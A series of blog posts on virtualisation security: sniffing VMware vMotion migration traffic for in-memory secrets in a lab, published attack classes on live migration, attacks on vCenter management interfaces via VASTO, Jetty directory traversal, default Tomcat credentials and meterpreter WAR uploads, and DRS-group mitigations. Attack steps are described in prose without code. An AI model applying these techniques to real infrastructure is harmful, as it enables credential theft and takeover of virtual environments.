Attacking additional virtualisation infrastructure

10 02 2015

I should start by stating that in almost all documents regarding live migration, High Availability (HA) and Fault tolerance configurations, it is stated that these networks should be placed on isolated networks that are not shared or accessible by unauthorised individuals. In an article by (Siebert, 2011) it specifically states to:

“Keep management and storage traffic, for instance, on a physically isolated network that’s away from the regular VM network traffic”

However, this does not diminish the argument that this information is still being moved inside the environment and should these guidelines be overlooked or the networks breached, the consequences of what can be achieved can be unintelligible to staff only familiar with traditional methods.

Live migration traffic

Live migration can be used to move machines between hosts that are located in the same blade chassis, across campuses and even over different continents, with minimal downtime (Travostino, et al., 2006). The action of preforming a live migration from one host to another is a common feature found in many of the larger VMMM such as XEN and VMware. The act of moving a machine across hosts in the VMware environment can be a manual or automated process when combined with other features such as DRS and DPM (Distributed Power Management). While explanations of the DRS feature is discussed in numerous earlier posts, DPM enables vCenter to automate the movement of machines off hosts during quiet periods of usage, allowing them to be powered down thus improving power consumption. It is my personal option that live migration is one of the more intriguing introductions of virtualisation, as the information that is located in RAM contains such important information.

Using the test environment I will demonstrate what is possible when access to the vMotion network is obtained. For this example a vMotion has been initiated specifying that VM1 on ESX1 is to be migrated – and only the host portion is required to move and not the datastore. The VM will be moved to the only other host in the cluster, ‘ESX2’. To understand how this process is vulnerable to attacks I will first breakdown the processes of the steps involved in this operation (Kutz, 2007):

  1. The request is made specifying the VM and which host it will be moved to.
  2. All of the RAM of VM1 is copied over the vMotion network to ESX2, any active changes happening during this time on ESX1 are written to a memory bitmap on ESX1.
  3. VM1 is quiesced on ESX1 and the memory contained in the bitmap is copied over the vMotion network to ESX2.
  4. VM1 is started on ESX2 and access to the VM are sent to the instance on ESX2.
  5. Remaining memory from VM1 is copied from ESX1, while memory is being read and written from VM1 on ESX1.
  6. Once successful, VM1 is unregistered on ESX1 and the task is complete.

In figure 1 we see a basic visual representation of the process in the test environment. For demonstration purposes and ease of result display, I have a separate vMotion network that uses a hub to connect the two machines. This will allow me to sniff traffic without having to perform an additional attack such as MiTM or configure port mirroring, port spanning, SPAN, RSPAN etc.

Basic visual representation of the process of a machine being migrated to another host in the test environment

Basic visual representation of the process of a machine being migrated to another host in the test environment

In the virtual machine that will be moved, I have written information into a text file but not saved it to disk, so that we can be sure it will be located in the machines memory. This information in the example is a representation of a secure document containing a username and password. This text file and content are shown in Figure 2.

An unsaved text file that has been written on the running virtual machine

An unsaved text file that has been written on the running virtual machine

I now initiate a vMotion request and starts a packet capture on the vMotion network using Wireshark. The network card is configured in promiscuous mode, to allow it to capture all of the packets being transmitted on the network. After the vMotion process has finished and the capture stopped, I am able to follow the TCP stream of the communication that took place between the two hosts and view the information in a searchable form. As is shown in Figure 3, the information transmitted in the document is viewable in clear text, although separated by some punctuation

A TPC stream of communication between the two hosts showing the notepad content

A TPC stream of communication between the two hosts showing the notepad content

Although this example used a notepad document to demonstrate the ability to sniff data, there are much greater risks to consider when addressing passive snooping attack on migration traffic. Microsoft stores LM authentication hashes for active sessions in memory (Pilkington, 2012) in all current versions of Windows. As a result, should a passive snooping attack take place while a machine is locked or logged on, the LM hash will also be viewable in the capture. Windows LM hashes are also reversible back into the user’s original password using online services such as (OS – Objectif Securite, 2012) and other hash cracking tools. Finally, and possibly of most concern, is the accessibility of encryption keys. Even when full disk encryption is used to secure data, the keys (after initial user input) are cached in memory by the operating system. On traditional hardware this is considered the safest place, as volatile memory is erased quickly once the power is taken away. This is something that usually requires physical access to the machine to exploit, unless the machine is already infected. It is now possible to sniff the encryption key during a live migration to obtain the encryption hash.

Live migration attacks are not only vulnerable to sniffing attacks. In a paper written in 2007 by (Oberheide, et al., 2007), the researchers describes a number of attacks that are possible on live migration traffic. In the paper the researchers discus three ‘classes’ of threats that can be used against live migration environments:

  • Control plane
  • Data Plane
  • Migration Module

Control plane attacks

Control plane attacks target the mechanisms that are employed to initiate and manage the migrations within the infrastructure manager. While there were no active attacks in the paper, the theory behind the attacks is still relevant and should be considered in a risk analysis exercise. The examples in the paper that (Oberheide, et al., 2007) highlights, demonstrate how successful attacks to the control plane could result in:

  • The migration of machines onto illegitimate hosts that are owned by the attacker.
  • Mass migration of a large number of machines, thus overloading the network and causing disruption to service.
  • Manipulating the resources management for hosts in a DRS style environment, so that hosts are not evenly distributed and overwhelm single resources.

Data plane attacks

Data plane attacks are threats that take place on the networks on which the migrations are situated. The passive snooping attack that was demonstrated previously is one of the attacks that are briefly mentioned in the paper. The second attack on the data plane class is described as ‘active manipulation”. As the name suggests, active manipulation is when data is changed during the migration of the machine. Although in the paper (Oberheide, et al., 2007) introduce their custom tool Xensploit for preforming this attack, it is merely the collection of existing attacks collated into one tool for ease of use. The attack works by using MiTM characteristics to intercept traffic between the two hosts and manipulating sections of the traffic (RAM) during transit. In the example of the Xensploit software in the paper (Oberheide, et al., 2007, p. 4) showed how the attack could be used to establish an SSH (Secure Shell) session to a machine configured to only allow connections from authorized sources. Using Xensploit they were able to manipulate within the object code of the SSHD process to add their key as an authorised source, thus allowing them to SSH once the new instance had completed its migration.

Migration Model attacks

Lastly, although these attacks are included in the paper, I feels that this section falls under one of my other previous topics of the hypervisor rather than on live migration. The paper briefly covers attacks that exploit vulnerabilities in the migration models – that are part of the VMM (virtual machine monitor).

Combining attacks

Gaining access to any of these attack classes should be considered a high risk to security staff, although with access to just one of the vectors, it may still not be possible for an attacker to target a specific machine depending on its physical location. If a combination of the attacks were available, the attacker would be able to leverage them to better achieve control of the environment. An example of this is in the case of data plane class attacks. These attacks are only useful if the target machine is being migrated during the period of capture. In environments where features such as DRS and DPM are not in use, it is possible for machines to stay fixed to a host for a considerable period of time. If the attacker was able to utilize an attack at the control plane they would be able to trigger the migration of the necessary machines for the attack to then take place at the data plane.

Shortly after the paper was released, VMware’s (Wu, 2008) comments on this attack:

“Although impressive, this work by no means represents any new security risk in the datacentre… Rather, it a reminder of how an already-compromised network, if left unchecked, could be used to stage additional severe attacks in any environment, virtual or physical.”

While I can appreciate what (Wu, 2008) is saying, I must disagree that these types of attacks are comparable to physical environments. Data-In-Transit on physical systems do not tend to include such sensitive information. It is also better understood in traditional systems that unsafe protocols such as email and ftp should not be used to transfer confidential information. While the previous example required physical access to the vMotion network, it is also possible to access this data remotely through misconfiguration, access to the management interface or manipulation of virtual infrastructure.

Wu, W., 2008. VMware Security & Compliance Blog. [Online] Available at: http://blogs.vmware.com/security/2008/02/keeping-your-vm.html

Siebert, E., 2011. Five VMware security breaches that should never happen. [Online] Available at: http://searchvmware.techtarget.com/tip/Five-VMware-security-breaches-that-should-never-happen

Travostino, F., Daspit, P. & Gommans, L., 2006. Seamless live migration of virtual machines over the MAN/WAN. Future Generation Computer Systems – IGrid 2005: The global lambda integrated facility, 22(8), pp. 901-907.

Kutz, A., 2007. How to obtain, configure and use VMotion and how VMotion works. [Online]
Available at: http://searchvmware.techtarget.com/tip/How-to-obtain-configure-and-use-VMotion-and-how-VMotion-works
Pilkington, M., 2012. Protecting Privileged Domain Accounts: LM Hashes — The Good, the Bad, and the Ugly. [Online]
Available at: http://computer-forensics.sans.org/blog/2012/02/29/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly

Oberheide, J., Cooke, E. & Jahanian, F., 2007. Empirical Exploitation of Live Virtual Machine Migratio. [Online]
Available at: http://www.eecs.umich.edu/techreports/cse/2007/CSE-TR-539-07.pdf





Attacking management interfaces

29 09 2014

The management interfaces and everything that is incorporated into that software is, in the author’s opinion the most problematic area in virtualisation security today. There have been numerous attempts over the last few years to demonstrate how management interfaces can be breeched. The majority of these attacks are general attacks that use pre-existing attack methods such as brute forcing, MiTM (man-in-the-middle) and the numerous flaws with the PKI infrastructure. There are multiple proven attack methods available for exploiting management interfaces and below are descriptions of some of these attacks that have been discovered by researchers.

In an online blog (Mluft, 2011)  talks about how a brute force attack is achievable on the Amazon Web Services (AWS) portal by leveraging existing hacking software tools. In the attack (Mluft, 2011) demonstrated how it is possible to determine a successful logon using the exemplary payloads in the Burp Suite (Burp Suite, 2012). The use of the burp suite in this example is to simply automate the process of attempting logins to the interface. The payload in the software is also able to identify failed login attempts to the portal by returning a HTTP status code of 200 (Network Working Group , 1999). A correct password attempt is identified by a returned HTTP status code of 302. Using the documentation provided by Amazons services in relation to password policies (Mluft, 2011) created an appropriate wordlist and used the burp suite to attempt all the possible permutations. After 400,000 attempts the attack was paused and the results purged for the 302 status code. The code was found and also shown alongside was the value and the password attempted. This gave the attacker the username and password for the administration of all servers managed by that account. It should be noted that all of these attempts were originated from one IP address without the account being locked-out or subject to any account throttling.

As discussed earlier my earlier blog artical regarding the hypervisor, the Virtualization Assessment Toolkit (VASTO) has been developed to exploit multiple weaknesses, predominantly in the VMware family. As well as the identification module that returns the exact version of the server, it includes numerous attacks on virtual systems including a specific VMware brute forcing module, which mimics the attack on the AWS portal by (Mluft, 2011). One of the main contributors to the VASTO project (Criscione, 2010) demonstrated a number of the different functions found in VASTO at Blackhat USA 2010.  Although (Criscione, 2010) demonstrated how VASTO can be used at multiple layers of the virtual stack (Client, Hypervisor, Support, Management and internal), the majority concentrated on the management portion. (Criscione, 2010) confirms that although the (VMware, 2012) hardening guide recommends segmentation of management networks, these recommendations are often ignored and left situated on the same networks as traditional servers.

These servers that manage the entire fabric of the infrastructure have multiple attack vectors – from the operating systems they are installed on to the web services running the interfaces. Vulnerabilities in any one of these platforms can potentially jeopardise the security of an entire environment and should be taken very seriously.

The other element used in the VASTO modules which can target the management portion of the virtual infrastructure uses target flaws in the VMware components and implementation to expose threats in the infrastructure. One of the exploits that is included in the VASTO suite that best demonstrates how multiple components in these systems can be used for exploitation, originates via a flaw in the Jetty (Eclipse, 2012) web server that is used by vCenter Update manager. In the author’s opinion, this attack signifies how the complexity and code overhead that these management servers introduce, make securing virtual environments in an efficient manner, one that needs to be understood and prioritised. I will briefly give a breakdown of this attack to highlight the multiple elements that were used to complete the attack.

The Update Manager component of the vSphere suite is designed to secure the environment by automating the patching and updating process of hosts that fall under its management scope. However, (Criscione, 2010) recognised that the update manager requires a version of Jetty web server to operate. This is an additional component that is added to the total footprint of the management server. The version of Jetty installed prior to version 4.1 u1 (update 1) of the update manager was a version vulnerable to a directory traversal attack (Wilkins, 2009), which allowed attackers to view any files on a server that the Windows SYSTEM user has privileges. Consequentially vCenter stored a file on the server called “vpxd-profiler-*” which is a file used by administrators for debugging purposes. In this extensive file the, SOAP Session ID’s of all the users that have connected to that server are contained. With this ID the vmware_session_rider module, found in the VASTO toolkit, acts as a proxy server to allow the attacker to then connect through it into the vCenter server using the selected administrator SOAP ID. Once this is completed, the attacker is able to create a new admin credential within vCenter to ensure future access.

Another example of how different elements of the management interface could be used to gain access to vCenter is through VMware’s use of Apache Tomcat technology (The Apache Software Foundation, 2012). When navigating to a vCenter server through a web browser one is presented with the standard vSphere “Getting started” screen as is shown in figure 1

Web browser connection to vCenter server

Web browser connection to vCenter server

Connection to that same servers IP address, but specifying the default tomcat Tomcats index page port of “8443” over an SSL connection shows further information, including a link to login as the “Tomcat manager”. This page is shown in figure 2

The web interface seen when you navigate to vCenter with a port of 8443

The web interface seen when you navigate to vCenter with a port of 8443

In VMware version 4.1 there is a user named “VMwareAdmin” that is automatically added to the Tomcat server, which has full admin rights to the Tomcat service. In the earlier versions of VMware, the password for this admin account was 5 characters long starting with 3 uppercase, 1 number and one lowercase. This leaves an attacker with a number of options for an attacking perspective. The most obvious is to brute force the credentials with a compatible tools or script such as the Apache tomcat brute force tool (Snipt, 2011). A second (and more sophisticated attack) would be to use the folder traversal vulnerability introduced by the Jetty service to gain read access to the server. From here the attacker could navigate to the “tomcat-users.xml” file (C:\Program Files\VMware\Infrastructure\tomcat\conf) as shown in Figure 3, which is an XML file found in VMware 4.1 and which shows the clear text credentials of the account.

(left) The tomcat-users.xml file showing the username and password of a default admin account (Right) tomcat manager login prompt

(left) The tomcat-users.xml file showing the username and password of a default admin account (Right) tomcat manager login prompt

Using this access, an attacker is able to control elements of the web service with admin rights. As shown in Figure 4, one is able to change a number of settings through the tomcat interface, including the ability to upload custom WAR files, which can be created using Metaspolit to upload meterpreter payloads to the server.

Logged in to the tomcat manager using the credentials found on server

Logged in to the tomcat manager using the credentials found on server

Although some of the attacks using the VASTO toolkit are specific and use vulnerabilities that have almost all been patched by VMware (at the time of writing), the management interfaces are still vulnerable to more general network attacks that are not as fundamental to secure as simply applying a patch or updating to the newest version. As is explained briefly in by post on hypervisors, access to these interfaces are vulnerable to MiTM attacks and the implementations dependence on a highly insecure certificate/PKI model. These vulnerabilities are not directly the responsibility of the vendors, but certainly nothing has been done by them to address this issue.

I will not be explaining the process of how MiTM attacks and flaws in the certificate infrastructure can be used to capture login credentials, as this a fundamental part of security and has been covered on numerous occasions by multiple sources (Irongeek, 2012) (Schneier, 2011). I have also written about the overarching problems with the certificate model and how it can be bypassed by in a blog post from 2011.

 

Mluft, 2011. The Key to your Datacenter. [Online] Available at: http://www.insinuator.net/2011/07/the-key-to-your-datacenter/

Criscione, C., 2010. Blackhat 2010 – Virtually Pwned. USA: Youtube.

Wilkins, G., 2009. Vulnerability in ResourceHandler and DefaultServlet with aliases. [Online] Available at: http://jira.codehaus.org/browse/JETTY-1004

Irongeek, 2012. Using Cain to do a “Man in the Middle” attack by ARP poisoning. [Online] Available at: http://www.irongeek.com/i.php?page=videos/using-cain-to-do-a-man-in-the-middle-attack-by-arp-poisoning

Schneier, B., 2011. Schneier on Security. [Online] Available at: http://www.schneier.com/blog/archives/2011/09/man-in-the-midd_4.html





Mitigation techniques for hypervisors

3 01 2014

There are both vendor specific and general vendor agnostic network security mitigation techniques that can be used to eliminate scanning and direct connection to the hypervisor. These include IDS/IPS (Intrusion Detection Systems / Intrusion Prevention Systems) on the network portion – to detect and block known scanning patterns performed by common scanning tools and specific vendor hardening options, such as VMware’s Lockdown Mode (VMware, 2012), which turns off the ability to connect directly to the host from anything other than the vCenter’s ‘vpxuser’ account.  However, there are many known evasion techniques available to bypass IDS/IPS systems and while permitted communication may be rejected by VMware’s ‘Lockdown mode’, vulnerabilities in the hypervisor code may still leave other communication channels open to abuse and this would be the case in all hypervisors.

In the author’s opinion, hypervisors should be situated on their own network/subnet, with strict ACL’s in place thus making them directly inaccessible to anyone outside of a limited scope of technical staff. There will be few systems in traditional networks that require this kind of isolation from users, as most require at least some level of user interaction for services etc. While this measure should be sufficient to eliminate attacks being performed directly on the hypervisors, utilising additional layers of defence such as IDS/IPS and specific hypervisor hardening mechanisms such as VMware’s ‘lockdown mode’ should also be used in parallel, to further ensure the integrity of the host.

Unfortunately these multiple network layers of protection do not address the issue of VM escape attacks as mentioned in my last post.  To achieve this, technicians should apply the same security mentality to the hypervisor layer that has previously been applied to the network layer. Depending on the size and nature of a virtualisation platform, layers should be applied to this new portion of infrastructure. One of the layers should be able to mitigate a worst case scenario attack, where an attacker targets less secured and more accessible VM’s on the infrastructure to attack higher valued VM’s running on the same hypervisor. To do this (again depending on the size and risk model of the environment), clusters could be configured to divide virtual machines into categories based on their security rating and grouped together accordingly. While this may be less beneficial when calculating the total ROI that virtualisation offers it is beneficial from a security perspective as the larger the resource pools are (in terms of the number of shared hardware elements) the more efficient the use of hardware is and therefore results in lower overheads. This cost should be offset against the likelihood and impact this kind of attack could cause in order to factor in the increased costs of grouping machines by security rating.

One method of eliminating the threat of machines running on the same hypervisor, even in an automated resource allocation environment such as the VMware’s DRS feature (Distributed Resource Scheduler), is to utilise the groups and rules available in the VMMM. A specific example of this is in the latest version of VMware’s vCenter (Version 5), there are options to collate groups/clusters of machines and set preferences on to which hypervisor they are situated on. Although this feature is intended for the purpose of grouping and separating machines from a resource and availability perspective, the authors also considers that this could also be used to ensure the security of machines against many hypervisor attacks, as well as other attacks, which will be discussed a later post.

In the example below, the author demonstrates a method that can be used for ensuring that machines with differing security classes are not located on the same physical host in automated distributed resource environments by using the resource rules in the VMware vCenter suite. This is done by assigning virtual machines into groups based on the security rating they are considered to have by the organisation. This method of using machine groups for security purposes in DRS environments is one that the author has not seen documented or discussed elsewhere.

These rules could be scaled depending on the size or risk index determined by the organization. There is also scope within these rules to balance out the resource/security overhead by specifying that the machine should not run on a certain host rather than must not. It should also be noted that VMware’s vCloud Datacenter offers a (Lodge, 2010) “Dedicated VDC” option, which provides physically separate hardware – ideal for meeting security or regulatory requirements, where physically sharing isn’t an option”.

Using vCenter groups for segmentation

In this example, the author has set up a simple scenario demonstrating how the rules in VMware’s vCenter suite could be used to separate a group of machines, considered insecure, from running on the same hypervisor/host as another group that are considered secure. This method of using machine groups for security purposes in DRS environments is one that the author has not seen documented or discussed anywhere else prior to writing this.

Using DRS groups, two groups are created - ‘Secure-servers’ and ‘Insecure’. Machines are associated with the appropriate group based on their service etc

Using DRS groups, two groups are created – ‘Secure-servers’ and ‘Insecure’. Machines are associated with the appropriate group based on their service etc

A rule is created specifying that all servers in the 'Secure-Server' group must run on ESX1

A rule is created specifying that all servers in the ‘Secure-Server’ group must run on ESX1

Another rule is created specifying that all machines in the 'Insecure' group must not run on ESX1

Another rule is created specifying that all machines in the ‘Insecure’ group must not run on ESX1

These rules could be scaled depending on the size or risk index determined by the organization. There is also scope within these rules to balance out the resource/security overhead by specifying that the machine should not run on a certain host rather than must not. It should also be noted that VMware’s vCloud Datacenter offers a (Lodge, 2010) “Dedicated VDC” option, which provides physically separate hardware – ideal for meeting security or regulatory requirements, where physically sharing isn’t an option

Lodge, M., 2010. Getting rid of noisy neighbors: Enterprise class cloud performance and predictability. [Online]
Available at: http://blogs.vmware.com/rethinkit/2010/09/getting-rid-of-noisy-cloud-neighbors.html